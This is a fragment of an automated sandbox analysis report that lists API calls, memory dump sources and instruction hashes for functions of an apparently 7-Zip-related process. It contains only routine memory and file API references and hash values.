                                                                                                                                                                • memmove.MSVCRT ref: 007C4065
                                                                                                                                                                • memmove.MSVCRT ref: 007C4087
                                                                                                                                                                  • Part of subcall function 00793404: free.MSVCRT ref: 00793431
                                                                                                                                                                  • Part of subcall function 00793404: memmove.MSVCRT ref: 0079344C
                                                                                                                                                                  • Part of subcall function 00792130: malloc.MSVCRT ref: 00792134
                                                                                                                                                                  • Part of subcall function 00792130: _CxxThrowException.MSVCRT ref: 0079214F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memmove$ExceptionThrowfreemalloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1415420288-0
                                                                                                                                                                • Opcode ID: 19adca41d0c10e802e7e9a033628de9dc28b031a0220b8790a91693c387ff0bb
                                                                                                                                                                • Instruction ID: 27bd307ca242cdd4a1eb071b34a32b32a4475eb8c06df3eee55a5c001b0bf3e5
                                                                                                                                                                • Opcode Fuzzy Hash: 19adca41d0c10e802e7e9a033628de9dc28b031a0220b8790a91693c387ff0bb
                                                                                                                                                                • Instruction Fuzzy Hash: 991193623156C5D2CE31EB15F4997EEA321F791790F80842AD79D47A69DB3CC68ACB00
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                • Opcode ID: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                                                                                                                • Instruction ID: 7f959a08071e5271e67aa19bc7e82cc7321c48b9df67fe686e3ffda6b7e207d4
                                                                                                                                                                • Opcode Fuzzy Hash: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                                                                                                                • Instruction Fuzzy Hash: 2BF08163302A94C6DA20AA26E8446AD6710AB86FB1F198320DF7917B91CF28C957C300
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00792130: malloc.MSVCRT ref: 00792134
                                                                                                                                                                  • Part of subcall function 00792130: _CxxThrowException.MSVCRT ref: 0079214F
                                                                                                                                                                • memmove.MSVCRT ref: 007DC815
                                                                                                                                                                • free.MSVCRT ref: 007DC81D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionThrowfreemallocmemmove
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1097815484-0
                                                                                                                                                                • Opcode ID: 581426f19328811152166685f6cf1937972c62f6cd3183fa7d76b20dd62ec97f
                                                                                                                                                                • Instruction ID: 0fb1bc3ddcd32a73bbff78c319fedea471a9b11aeb37921ea31d7ee81bfc6657
                                                                                                                                                                • Opcode Fuzzy Hash: 581426f19328811152166685f6cf1937972c62f6cd3183fa7d76b20dd62ec97f
                                                                                                                                                                • Instruction Fuzzy Hash: C4018177702588CBCB14DF26D46596CB765E388F99B08C12ADF054B358CA38DC96CB90
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 007D0A42
                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 007D0A73
                                                                                                                                                                  • Part of subcall function 007DB480: GetTickCount.KERNEL32 ref: 007DB49E
                                                                                                                                                                  • Part of subcall function 007DB480: strcmp.MSVCRT ref: 007DB4E3
                                                                                                                                                                  • Part of subcall function 007DB480: wcscmp.MSVCRT ref: 007DB502
                                                                                                                                                                  • Part of subcall function 007DB480: strcmp.MSVCRT ref: 007DB568
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSectionstrcmp$CountEnterLeaveTickwcscmp
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3267814326-0
                                                                                                                                                                • Opcode ID: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                                                                                                                • Instruction ID: 7d3a3a93684ee1d34b93e70db50d113e231479f87b67daecba1d5a2fbe903e3b
                                                                                                                                                                • Opcode Fuzzy Hash: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                                                                                                                • Instruction Fuzzy Hash: D2F0E266614A9082E7108F24E8443A86370EB44FB4F144335DE7E477E4CF3C848AC314
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                • Opcode ID: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                                                                                                                • Instruction ID: 06863dc9e763f9f91cd665a913522dc70e7ee91a22042d9c39f7a7afa747d275
                                                                                                                                                                • Opcode Fuzzy Hash: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                                                                                                                • Instruction Fuzzy Hash: DAE01C62259644E1CE20FB24F45545AA720EBC57B4B442311B6BF567BADE2CC686CA00
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionThrowmalloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2436765578-0
                                                                                                                                                                • Opcode ID: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                                                                                                                • Instruction ID: b61cd6991a87a2957ef70e01324d5fddcb3e1d5ec539611430484e86535ffe3e
                                                                                                                                                                • Opcode Fuzzy Hash: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                                                                                                                • Instruction Fuzzy Hash: 4DD01291F1B685E1DE09BB54A8C53186730AB98740F945056E24F01725DA5CD19FC701
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                                                                                                                • Instruction ID: a3872f404155923029d2bc415b85127ed2566721f2cf9a19818828c89f0d8bd1
                                                                                                                                                                • Opcode Fuzzy Hash: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                                                                                                                • Instruction Fuzzy Hash: 20513D72244AC095CB61CF39D4402DD2B61F3CAF98F694276DF9A4AB1ADF29C886C711
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteString
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4236320881-0
                                                                                                                                                                • Opcode ID: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                                                                                                                • Instruction ID: eade6868374e7ef07e71fc54867706069aee40962c69ede4aa232594c0549ca3
                                                                                                                                                                • Opcode Fuzzy Hash: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                                                                                                                • Instruction Fuzzy Hash: F011C81661878182E3A08B58E4407EA6764F7847E8F648321EFDA577E8EF3CCD85C706
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00798A60: SetFilePointer.KERNELBASE(?,?,00000003,?,00798E1D), ref: 00798A99
                                                                                                                                                                  • Part of subcall function 00798A60: GetLastError.KERNEL32(?,?,00000003,?,00798E1D), ref: 00798AA6
                                                                                                                                                                • SetEndOfFile.KERNELBASE ref: 00798CC7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$ErrorLastPointer
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 841452515-0
                                                                                                                                                                • Opcode ID: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                                                                                                                • Instruction ID: 116baea6a9b5f6680f6ed564e8f76c400796a0cec9adba7aa25d7277d31e1c58
                                                                                                                                                                • Opcode Fuzzy Hash: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                                                                                                                • Instruction Fuzzy Hash: 39E02612301898D2EBA09BA1B48166A8310AB477E0F489071AA4983B48CE6D8CDA8720
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00796464: FreeLibrary.KERNELBASE(?,?,?,007964E7), ref: 00796475
                                                                                                                                                                • LoadLibraryExW.KERNELBASE ref: 007964F4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$FreeLoad
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 534179979-0
                                                                                                                                                                • Opcode ID: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                                                                                                                • Instruction ID: 15abd5cc513b92af2bdd80798eb0f6c22766a51f71dfdb2311b824223e70fafb
                                                                                                                                                                • Opcode Fuzzy Hash: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                                                                                                                • Instruction Fuzzy Hash: 09D02E21B00AA582EE102BA6784226803202F05BE0E88C030DE0E03320EE2D0CEBA300
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                • Opcode ID: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                                                                                                                • Instruction ID: 847ebd5162edda4eaf9ebdc4c3cba14fd1f0d9206b842252713bb7d8de6efaf7
                                                                                                                                                                • Opcode Fuzzy Hash: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                                                                                                                • Instruction Fuzzy Hash: 02E04676628644CBE740CF60E400B5AB3A0F788B24F004125DE8E83B54CBBCC045CF40
                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNELBASE(?,?,?,007964E7), ref: 00796475
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                • Opcode ID: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                                                                                                                • Instruction ID: ba6f2d94c6c6459f1ed74c0f58226c05e5f600a61ee86f24db3a182c59cd28fc
                                                                                                                                                                • Opcode Fuzzy Hash: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                                                                                                                • Instruction Fuzzy Hash: 01D012A2B02544C5FF154FE2F85433523646F58F44F5C5110CE194A250EB2D89958761
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                • Opcode ID: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                                                                                                                • Instruction ID: a869cd7f06140cb521f5d19a4f65506259630f282a52a515f6cd42c830b1c8bd
                                                                                                                                                                • Opcode Fuzzy Hash: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                                                                                                                • Instruction Fuzzy Hash: 8CD01776618684C6E7008F60E04575AF764F788B64F480005EA8906764CBBDC599CB00
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: fputs
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1795875747-0
                                                                                                                                                                • Opcode ID: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
                                                                                                                                                                • Instruction ID: d03474de0e457555b7d318db3c2d520c43da1e46e37a072b2351ed3682ed98b9
                                                                                                                                                                • Opcode Fuzzy Hash: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
                                                                                                                                                                • Instruction Fuzzy Hash: 5ED0A7D570074981CE109726E4042692321BB48BC4F484021DD9E07314D92CD1148B00
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseFind
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                                • Opcode ID: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
                                                                                                                                                                • Instruction ID: 77578934a4998bf3c29d486e38dc693230a46c372951fe78f3823ba38484d985
                                                                                                                                                                • Opcode Fuzzy Hash: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
                                                                                                                                                                • Instruction Fuzzy Hash: 60D0C976A1994581DF252FBAA8403682362EB95F74F288321CAB54A3E0DF2D9496C711
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileTime
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1425588814-0
                                                                                                                                                                • Opcode ID: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
                                                                                                                                                                • Instruction ID: c01c92e183b8c0cee0cca59745a2dde0af42a9892e552d845f88420f15891e90
                                                                                                                                                                • Opcode Fuzzy Hash: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
                                                                                                                                                                • Instruction Fuzzy Hash: 9FB09220B12400C2CB0C6722D89231C13606B88B21FE1842AC50FD5650CD1D85E94700
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                • Opcode ID: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                                                                                                                                                • Instruction ID: 1aa81e82c7f8c9030392b70352eacce739ca046cfe00552ccd632b22e8922e76
                                                                                                                                                                • Opcode Fuzzy Hash: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                                                                                                                                                • Instruction Fuzzy Hash: A22128B3704244D6C724DA2AB844BDB7794F789BA4F645224FE6647794EF3CC982C780
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                • Opcode ID: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                                                                                                                                                • Instruction ID: 9bceaee141e398e42a96cb8ab9138ef7f788a1068c8248387f65d364d0e6e15a
                                                                                                                                                                • Opcode Fuzzy Hash: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                                                                                                                                                • Instruction Fuzzy Hash: 8C11367271566087CF328B6CF4502287251F7007F4B648036DBCA8BA15EA6EEC829201
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
